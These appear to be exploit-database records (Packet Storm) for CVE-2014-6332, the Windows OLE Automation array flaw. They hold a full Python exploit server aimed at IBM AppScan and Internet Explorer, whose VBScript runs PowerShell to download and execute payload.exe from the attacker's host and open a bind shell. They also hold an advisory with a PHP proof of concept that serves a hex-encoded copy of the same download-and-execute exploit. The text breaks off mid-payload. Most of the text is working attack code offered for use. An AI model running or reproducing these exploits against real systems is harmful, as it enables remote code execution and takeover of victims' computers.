"cvelist": ["CVE-2014-6332"], "modified": "2015-06-01T00:00:00", "id": "PACKETSTORM:132113", "href": "https://packetstormsecurity.com/files/132113/IBM-Security-AppScan-9.0.2-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n \nimport BaseHTTPServer, socket \n \n## \n# IBM Security AppScan Standard OLE Automation Array Remote Code Execution \n# \n# Author: Naser Farhadi \n# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 \n# \n# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 \n# \n# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ \n# if you able to exploit IE then you can exploit appscan and acunetix ;) \n# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And \n# Metasploit windows/shell_bind_tcp Executable Payload \n# \n# Usage: \n# chmod +x appscan.py \n# ./appscan.py \n# ... \n# nc 172.20.10.14 333 \n# \n# Video: http://youtu.be/hPs1zQaBLMU \n## \n \nclass RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \ndef do_GET(req): \nreq.send_response(200) \nif req.path == \"/payload.exe\": \nreq.send_header('Content-type', 'application/exe') \nreq.end_headers() \nexe = open(\"payload.exe\", 'rb') \nreq.wfile.write(exe.read()) \nexe.close() \nelse: \nreq.send_header('Content-type', 'text/html') \nreq.end_headers() \nreq.wfile.write(\"\"\"Please scan me! \n<SCRIPT LANGUAGE=\"VBScript\"> \nfunction runmumaa() \nOn Error Resume Next \nset shell=createobject(\"Shell.Application\") \ncommand=\"Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://\"\"\"+socket.gethostbyname(socket.gethostname())+\"\"\"/payload.exe',\\ \n'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');\" \nshell.ShellExecute \"powershell\", \"-Command \" & command, \"\", \"runas\", 0 \nend function \n \ndim aa() \ndim ab() \ndim a0 \ndim a1 \ndim a2 \ndim a3 \ndim win9x \ndim intVersion \ndim rnda \ndim funclass \ndim myarray \n \nBegin() \n \nfunction Begin() \nOn Error Resume Next \ninfo=Navigator.UserAgent \n \nif(instr(info,\"Win64\")>0) then \nexit function \nend if \n \nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse \nexit function \n \nend if \n \nwin9x=0 \n \nBeginInit() \nIf Create()=True Then \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \nif(intVersion<4) then \ndocument.write(\"<br> IE\") \ndocument.write(intVersion) \nrunshellcode() \nelse \nsetnotsafemode() \nend if \nend if \nend function \n \nfunction BeginInit() \nRandomize() \nredim aa(5) \nredim ab(5) \na0=13+17*rnd(6) \na3=7+3*rnd(5) \nend function \n \nfunction Create() \nOn Error Resume Next \ndim i \nCreate=False \nFor i = 0 To 400 \nIf Over()=True Then \n' document.write(i) \nCreate=True \nExit For \nEnd If \nNext \nend function \n \nsub testaa() \nend sub \n \nfunction mydata() \nOn Error Resume Next \ni=testaa \ni=null \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=i \nab(0)=6.36598737437801E-314 \n \naa(a1+2)=myarray \nab(2)=1.74088534731324E-310 \nmydata=aa(a1) \nredim Preserve aa(a0) \nend function \n \n \nfunction setnotsafemode() \nOn Error Resume Next \ni=mydata() \ni=readmemo(i+8) \ni=readmemo(i+16) \nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4 \nj=readmemo(i+&h120+k) \nif(j=14) then \nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4) \nredim Preserve aa(a0) \n \nj=0 \nj=readmemo(i+&h120+k) \n \nExit for \nend if \n \nnext \nab(2)=1.69759663316747E-313 \nrunmumaa() \nend function \n \nfunction Over() \nOn Error Resume Next \ndim type1,type2,type3 \nOver=False \na0=a0+a3 \na1=a0+2 \na2=a0+&h8000000 \n \nredim Preserve aa(a0) \nredim ab(a0) \n \nredim Preserve aa(a2) \n \ntype1=1 \nab(0)=1.123456789012345678901234567890 \naa(a0)=10 \n \nIf(IsObject(aa(a1-1)) = False) Then \nif(intVersion<4) then \nmem=cint(a0+1)*16 \nj=vartype(aa(a1-1)) \nif((j=mem+4) or (j*8=mem+8)) then \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nelse \nredim Preserve aa(a0) \nexit function \n \nend if \nelse \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nend if \nend if \n \n \nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then \nOver=True \nwin9x=1 \nEnd If \n \nredim Preserve aa(a0) \n \nend function \n \nfunction ReadMemo(add) \nOn Error Resume Next \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747E-313 \nReadMemo=lenb(aa(a1)) \n \nab(0)=0 \n \nredim Preserve aa(a0) \nend function \n \n</script>\"\"\") \n \nif __name__ == '__main__': \nsclass = BaseHTTPServer.HTTPServer \nserver = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) \nprint \"Http server started\", socket.gethostbyname(socket.gethostname()), 80 \ntry: \nserver.serve_forever() \nexcept KeyboardInterrupt: \npass \nserver.server_close() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132113/ibmappscan-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:17", "description": "", "cvss3": {}, "published": "2015-08-22T00:00:00", "type": "packetstorm", "title": "Microsoft HTA (HTML Application) Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-22T00:00:00", "id": "PACKETSTORM:133261", "href": "https://packetstormsecurity.com/files/133261/Microsoft-HTA-HTML-Application-Remote-Code-Execution.html", "sourceData": "`Document Title: \n=============== \nMicrosoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064) \n \n \nReferences (Source): \n==================== \nhttp://www.vulnerability-lab.com/get_content.php?id=1576 \n \nVideo: http://youtu.be/Vkswz7vt23M \n \nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332 \n \nCVE-ID: \n======= \nCVE-2014-6332 \n \n \nRelease Date: \n============= \n2015-08-15 \n \n \nVulnerability Laboratory ID (VL-ID): \n==================================== \n1576 \n \n \nCommon Vulnerability Scoring System: \n==================================== \n9.3 \n \n \nAbstract Advisory Information: \n============================== \nThe Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064. \n \n \nVulnerability Disclosure Timeline: \n================================== \n2015-08-15: Public Disclosure (Vulnerability Laboratory) \n \n \nDiscovery Status: \n================= \nPublished \n \n \nExploitation Technique: \n======================= \nRemote \n \n \nSeverity Level: \n=============== \nHigh \n \n \nTechnical Details & Description: \n================================ \nOleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, \nWindows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by \nan array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation \nArray Remote Code Execution Vulnerability. \n \n \nProof of Concept (PoC): \n======================= \nThe vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts. \nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. \n \nManual steps to reproduce ... \n1 . Run php code : php hta.php \n2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip) \n3 . Open poc.hta \n4 . Your Link Download/Execute on your target \n5 . Finished ;) \n \n#!/usr/bin/php \n<?php \n# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# MS14-064 \n# \n# \n# 1 . run php code : php hta.php \n# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) \n# 3 . open poc.hta \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n# \n# Demo : http://youtu.be/Vkswz7vt23M \n# \n \n \n \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n \n \nprint \" Mohammad Reza Espargham\\n\\n\\n\"; \n \n$host= gethostname(); #g3th0stn4m3 \n$ip = gethostbyname($host); #g3th0stbyn4m3 \n \nprint \"Winrar HTML Code\\n\".'<html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://' . $ip . '\"></head></html>'.\"\\n\\n\"; \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \n \n$msgd = \n\"\\x3c\\x68\\x74\\x6d\\x6c\\x3e\\x0d\\x0a\\x3c\\x6d\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\". \n\"\\x3d\\x22\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x22\\x20\\x63\\x6f\\x6e\\x74\\x65\". \n\"\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x45\\x6d\\x75\\x6c\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3e\\x0d\\x0a\\x3c\\x68\". \n\"\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x20\". \n\"\\x0d\\x0a\\x3c\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4c\\x41\\x4e\\x47\\x55\\x41\\x47\\x45\\x3d\\x22\\x56\\x42\\x53\\x63\". \n\"\\x72\\x69\\x70\\x74\\x22\\x3e\\x0d\\x0a\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x72\\x75\\x6e\\x6d\\x75\". \n\"\\x6d\\x61\\x61\\x28\\x29\\x20\\x0d\\x0a\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\". \n\"\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6c\\x6c\\x3d\\x63\\x72\\x65\\x61\\x74\\x65\\x6f\\x62\". \n\"\\x6a\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6c\\x6c\\x2e\\x41\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x22\". \n\"\\x29\\x0d\\x0a\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3d\\x22\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x2d\\x45\\x78\\x70\\x72\\x65\". \n\"\\x73\\x73\\x69\\x6f\\x6e\\x20\\x24\\x28\\x4e\\x65\\x77\\x2d\\x4f\\x62\\x6a\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\". \n\"\\x6d\\x2e\\x4e\\x65\\x74\\x2e\\x57\\x65\\x62\\x43\\x6c\\x69\\x65\\x6e\\x74\\x29\\x2e\\x44\\x6f\\x77\\x6e\\x6c\\x6f\\x61\". \n\"\\x64\\x46\\x69\\x6c\\x65\\x28\\x27\\x46\\x49\\x4c\\x45\\x5f\\x44\\x4f\\x57\\x4e\\x4c\\x4f\\x41\\x44\\x27\\x2c\\x27\\x6c\". \n\"\\x6f\\x61\\x64\\x2e\\x65\\x78\\x65\\x27\\x29\\x3b\\x24\\x28\\x4e\\x65\\x77\\x2d\\x4f\\x62\\x6a\\x65\\x63\\x74\\x20\\x2d\". \n\"\\x63\\x6f\\x6d\\x20\\x53\\x68\\x65\\x6c\\x6c\\x2e\\x41\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x29\\x2e\\x53\". \n\"\\x68\\x65\\x6c\\x6c\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6c\\x6f\\x61\\x64\\x2e\\x65\\x78\\x65\\x27\\x29\\x3b\". \n\"\\x22\\x0d\\x0a\\x73\\x68\\x65\\x6c\\x6c\\x2e\\x53\\x68\\x65\\x6c\\x6c\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\". \n\"\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c\\x2e\\x65\\x78\\x65\\x22\\x2c\\x20\\x22\\x2d\\x43\\x6f\\x6d\\x6d\\x61\\x6e\". \n\"\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2c\\x20\\x22\\x22\\x2c\\x20\\x22\\x72\\x75\\x6e\\x61\". \n\"\\x73\\x22\\x2c\\x20\\x30\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x3c\\x2f\\x73\". \n\"\\x63\\x72\\x69\\x70\\x74\\x3e\\x0d\\x0a\\x20\\x0d\\x0a\\x3c\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4c\\x41\\x4e\\x47\\x55\". \n\"\\x41\\x47\\x45\\x3d\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3e\\x0d\\x0a\\x20\\x20\\x0d\\x0a\\x64\\x69\\x6d\". \n\"\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0d\\x0a\\x64\\x69\\x6d\". \n\"\\x20\\x20\\x20\\x61\\x30\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x31\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\". \n\"\\x32\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x33\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\". \n\"\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x0d\\x0a\\x64\\x69\\x6d\\x20\". \n\"\\x20\\x20\\x72\\x6e\\x64\\x61\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x6c\\x61\\x73\\x73\\x0d\\x0a\". \n\"\\x64\\x69\\x6d\\x20\\x20\\x20\\x6d\\x79\\x61\\x72\\x72\\x61\\x79\\x0d\\x0a\\x20\\x0d\\x0a\\x42\\x65\\x67\\x69\\x6e\\x28\". \n\"\\x29\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x42\\x65\\x67\\x69\\x6e\\x28\\x29\\x0d\\x0a\". \n\"\\x20\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\". \n\"\\x20\\x20\\x69\\x6e\\x66\\x6f\\x3d\\x4e\\x61\\x76\\x69\\x67\\x61\\x74\\x6f\\x72\\x2e\\x55\\x73\\x65\\x72\\x41\\x67\\x65\". \n\"\\x6e\\x74\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x73\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x22\". \n\"\\x57\\x69\\x6e\\x36\\x34\\x22\\x29\\x3e\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\". \n\"\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6e\\x73\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x22\". \n\"\\x4d\\x53\\x49\\x45\\x22\\x29\\x3e\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6e\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x20\\x3d\\x20\\x43\\x49\\x6e\". \n\"\\x74\\x28\\x4d\\x69\\x64\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x20\\x49\\x6e\\x53\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x20\". \n\"\\x22\\x4d\\x53\\x49\\x45\\x22\\x29\\x20\\x2b\\x20\\x35\\x2c\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x65\". \n\"\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\". \n\"\\x6e\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x65\". \n\"\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\\x3d\\x30\\x0d\\x0a\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x42\\x65\\x67\\x69\\x6e\\x49\\x6e\\x69\\x74\\x28\\x29\\x0d\\x0a\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\". \n\"\\x74\\x65\\x28\\x29\\x3d\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x61\". \n\"\\x72\\x72\\x61\\x79\\x3d\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\". \n\"\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\". \n\"\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\". \n\"\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x61\". \n\"\\x72\\x72\\x61\\x79\\x3d\\x6d\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\". \n\"\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\". \n\"\\x30\\x29\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\". \n\"\\x6e\\x3c\\x34\\x29\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6f\\x63\\x75\". \n\"\\x6d\\x65\\x6e\\x74\\x2e\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3c\\x62\\x72\\x3e\\x20\\x49\\x45\\x22\\x29\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x77\\x72\\x69\\x74\\x65\\x28\\x69\". \n\"\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6e\". \n\"\\x73\\x68\\x65\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x6c\\x73\\x65\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6e\\x6f\\x74\\x73\\x61\\x66\\x65\\x6d\\x6f\\x64\\x65\\x28\\x29\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\". \n\"\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\". \n\"\\x6f\\x6e\\x20\\x42\\x65\\x67\\x69\\x6e\\x49\\x6e\\x69\\x74\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x52\\x61\\x6e\\x64\\x6f\". \n\"\\x6d\\x69\\x7a\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x61\\x61\\x28\\x35\\x29\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x61\\x62\\x28\\x35\\x29\\x0d\\x0a\\x20\\x20\\x20\\x61\\x30\\x3d\\x31\\x33\". \n\"\\x2b\\x31\\x37\\x2a\\x72\\x6e\\x64\\x28\\x36\\x29\\x0d\\x0a\\x20\\x20\\x20\\x61\\x33\\x3d\\x37\\x2b\\x33\\x2a\\x72\\x6e\". \n\"\\x64\\x28\\x35\\x29\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\". \n\"\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x4f\\x6e\\x20\\x45\". \n\"\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x64\\x69\\x6d\\x20\". \n\"\\x69\\x0d\\x0a\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3d\\x46\\x61\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x46\\x6f\\x72\". \n\"\\x20\\x69\\x20\\x3d\\x20\\x30\\x20\\x54\\x6f\\x20\\x34\\x30\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4f\\x76\". \n\"\\x65\\x72\\x28\\x29\\x3d\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\". \n\"\\x72\\x65\\x61\\x74\\x65\\x3d\\x54\\x72\\x75\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\". \n\"\\x46\\x6f\\x72\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\\x6e\\x64\\x20\\x49\\x66\\x20\\x0d\\x0a\\x20\\x20\\x4e\\x65\\x78\\x74\". \n\"\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x73\\x75\\x62\\x20\\x74\". \n\"\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x73\\x75\\x62\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\". \n\"\\x63\\x74\\x69\\x6f\\x6e\\x20\\x6d\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\\x20\\x45\". \n\"\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\". \n\"\\x3d\\x74\\x65\\x73\\x74\\x61\\x61\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\\x3d\\x6e\\x75\\x6c\\x6c\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\". \n\"\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x30\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3d\\x69\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\". \n\"\\x29\\x3d\\x36\\x2e\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2d\\x33\\x31\\x34\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2b\\x32\\x29\\x3d\\x6d\\x79\\x61\\x72\\x72\\x61\". \n\"\\x79\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3d\\x31\\x2e\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\". \n\"\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2d\\x33\\x31\\x30\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x64\\x61\". \n\"\\x74\\x61\\x3d\\x61\\x61\\x28\\x61\\x31\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\". \n\"\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\". \n\"\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\". \n\"\\x73\\x65\\x74\\x6e\\x6f\\x74\\x73\\x61\\x66\\x65\\x6d\\x6f\\x64\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\". \n\"\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\". \n\"\\x69\\x3d\\x6d\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x69\\x3d\\x72\\x75\\x6d\\x28\". \n\"\\x69\\x2b\\x38\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x69\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x31\\x36\\x29\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x66\\x6f\\x72\\x20\\x6b\\x3d\\x30\\x20\\x74\\x6f\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0d\". \n\"\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\\x31\\x32\\x30\\x2b\\x6b\". 